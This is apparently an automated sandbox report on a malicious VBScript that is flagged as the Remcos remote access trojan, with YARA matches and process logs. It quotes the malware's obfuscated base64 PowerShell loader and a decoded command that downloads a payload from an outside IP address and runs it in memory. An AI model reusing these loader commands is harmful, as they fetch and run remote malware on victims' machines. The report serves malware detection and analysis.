Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 00433FB0 appears 55 times

Java / VBScript file with very long strings (likely obfuscated code)

Source: sostener.vbs

Initial sample: Strings found which are bigger than 50

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2984
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2984			Jump to behavior

Yara signature match

Source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 7.2.powershell.exe.25f20579df8.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 15.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 7.2.powershell.exe.25f20579df8.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 7.2.powershell.exe.25f108182e0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000007.00000002.1478940778.0000025F206D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000007.00000002.1478940778.0000025F20450000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 5896, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: AddInProcess32.exe PID: 7536, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: 7.2.powershell.exe.25f10962108.1.raw.unpack, h.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.powershell.exe.25f10962108.1.raw.unpack, au.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.powershell.exe.25f28c70000.4.raw.unpack, h.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.powershell.exe.25f28c70000.4.raw.unpack, au.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.powershell.exe.25f287f0000.3.raw.unpack, h.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.powershell.exe.25f287f0000.3.raw.unpack, au.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.powershell.exe.25f108182e0.0.raw.unpack, h.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.powershell.exe.25f108182e0.0.raw.unpack, au.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winVBS@14/11@5/6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

15_2_00416AB7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

15_2_0040E219

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,

15_2_0041A63F

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 15_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-0883UG

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_huhpgnei.lkn.ps1

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: sostener.vbs

ReversingLabs: Detection: 21%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand IAAkAEMAWQByAEoAUAAgAD0AIAAoACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAIAApACAAOwAkAGcARwBpAG0AQQAgAD0AIAAoACAARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAALQBQAGEAdABoACAAJABDAFkAcgBKAFAAIAApACAAOwAgAA== -inputFormat xml -outputFormat text
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??Og?v?C8?OQ?x?C4?Mg?w?DI?Lg?y?DM?Mw?u?DE?Ng?5?C8?V?Bh?Gs?LwBS?GU?Zw?v?E0?YQBy?Ho?LwBE?FI?Rw?v?FI?V?BD?C8?QQBE?C8?Z?Bs?Gw?LgB0?Hg?d??n?C??Ow?k?EM?WQBy?Eo?U??g?D0?I??o?C??WwBT?Hk?cwB0?GU?bQ?u?Ek?Tw?u?F??YQB0?Gg?XQ?6?Do?RwBl?HQ?V?Bl?G0?c?BQ?GE?d?Bo?Cg?KQ?g?Cs?I??n?GQ?b?Bs?D??MQ?u?HQ?e?B0?Cc?I??p?C??OwBJ?G4?dgBv?Gs?ZQ?t?Fc?ZQBi?FI?ZQBx?HU?ZQBz?HQ?I??t?FU?UgBJ?C??J?BD?EM?UgBo?G0?I??t?E8?dQB0?EY?aQBs?GU?I??k?EM?WQBy?Eo?U??g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?I?Bw?G8?dwBl?HI?cwBo?GU?b?Bs?C4?ZQB4?GU?I??t?GM?bwBt?G0?YQBu?GQ?I?B7?C??J?BD?Fk?cgBK?F??I??9?C??K??g?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?C??KQ?g?Ds?J?Bn?Ec?aQBt?EE?I??9?C??K??g?Ec?ZQB0?C0?QwBv?G4?d?Bl?G4?d??g?C0?U?Bh?HQ?a??g?CQ?QwBZ?HI?SgBQ?C??KQ?g?Ds?I?B9?C??Ow?k?Hg?awBs?Gw?a??g?D0?I??n?D??Jw?g?Ds?J?Bi?H??dgBy?HY?I??9?C??Jw?l?Eo?awBR?GE?cwBE?GY?ZwBy?FQ?Zw?l?Cc?I??7?Fs?QgB5?HQ?ZQBb?F0?XQ?g?CQ?bQBx?G8?bgBz?C??PQ?g?Fs?cwB5?HM?d?Bl?G0?LgBD?G8?bgB2?GU?cgB0?F0?Og?6?EY?cgBv?G0?QgBh?HM?ZQ?2?DQ?UwB0?HI?aQBu?Gc?K??g?Cg?I?BH?GU?d??t?EM?bwBu?HQ?ZQBu?HQ?I??t?F??YQB0?Gg?I??k?EM?WQBy?Eo?U??g?Ck?LgBy?GU?c?Bs?GE?YwBl?Cg?Jw?k?CQ?Jw?s?Cc?QQ?n?Ck?I??p?C??OwBb?FM?eQBz?HQ?ZQBt?C4?QQBw?H??R?Bv?G0?YQBp?G4?XQ?6?Do?QwB1?HI?cgBl?G4?d?BE?G8?bQBh?Gk?bg?u?Ew?bwBh?GQ?K??k?G0?cQBv?G4?cw?p?C4?RwBl?HQ?V?B5?H??ZQ?o?Cc?V?Bl?Gg?dQBs?GM?a?Bl?HM?W?B4?Fg?e?B4?C4?QwBs?GE?cwBz?DE?Jw?p?C4?RwBl?HQ?TQBl?HQ?a?Bv?GQ?K??n?E0?cwBx?EI?SQBi?Fk?Jw?p?C4?SQBu?HY?bwBr?GU?K??k?G4?dQBs?Gw?L??g?Fs?bwBi?Go?ZQBj?HQ?WwBd?F0?I??o?C??JwBk?EE?Qg?0?EE?S?BR?EE?T?Bn?EI?MgBB?Ec?O?BB?GI?ZwBB?DU?QQBE?EU?QQBj?Hc?QgB2?EE?S?BN?EE?T?B3?EI?egBB?Ec?UQBB?Fk?UQBC?HY?QQBH?Hc?QQBi?Gc?Qg?z?EE?Rw?4?EE?WgBB?EE?dgBB?EQ?awBB?E0?UQBC?Gw?QQBI?Ek?QQBZ?Gc?QgB0?EE?RwBV?EE?YQBR?EI?MgBB?Ec?O?BB?GI?ZwBB?HY?QQBD?D??QQBM?FE?QQ?y?EE?R?Bj?EE?TgBR?EE?M?BB?Eg?SQBB?GI?dwBC?D??QQBH?E0?QQBa?FE?QgBv?EE?Qw?4?EE?WgB3?EI?eQBB?Ec?O?BB?Ew?ZwBC?D??QQBH?FU?QQBh?Hc?QgBq?EE?S?BV?EE?WQBn?EI?M?BB?Ec?awBB?Fk?ZwBB?HY?QQBD?Dg?QQBP?Gc?QgB6?EE?S?BB?EE?Z?BB?EI?M?BB?Ec?ZwBB?Cc?I??s?C??J?Bi?H??dgBy?HY?I??s?C??JwBf?F8?XwBf?F8?cwBj?HM?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Hg?awBs?Gw?a??s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?C??Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'http://91.202.233.169/Tak/Reg/Marz/DRG/RTC/AD/dll.txt' ;$CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;Invoke-WebRequest -URI $CCRhm -OutFile $CYrJP -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ; powershell.exe -command { $CYrJP = ( [System.IO.Path]::GetTempPath() + 'dll01.txt' ) ;$gGimA = ( Get-Content -Path $CYrJP ) ; } ;$xkllh = '0' ;$bpvrv = 'C:\Users\user\Desktop\sostener.vbs' ;[Byte[]] $mqons = [system.Convert]::FromBase64String( ( Get-Content -Path $CYrJP ).replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($mqons).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ( 'dAB4AHQALgB2AG8AbgA5ADEAcwBvAHMALwBzAGQAYQBvAGwAbgB3AG8AZAAvADkAMQBlAHIAYgBtAGUAaQB2AG8AbgAvAC0ALQA2ADcANQA0AHIAbwB0AGMAZQBoAC8AZwByAG8ALgB0AGUAawBjAHUAYgB0AGkAYgAvAC8AOgBzAHAAdAB0AGgA' , $bpvrv , '_____scs_______________________________________-------', $xkllh, '1', 'Roda' )) ;"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1	Jump to behavior
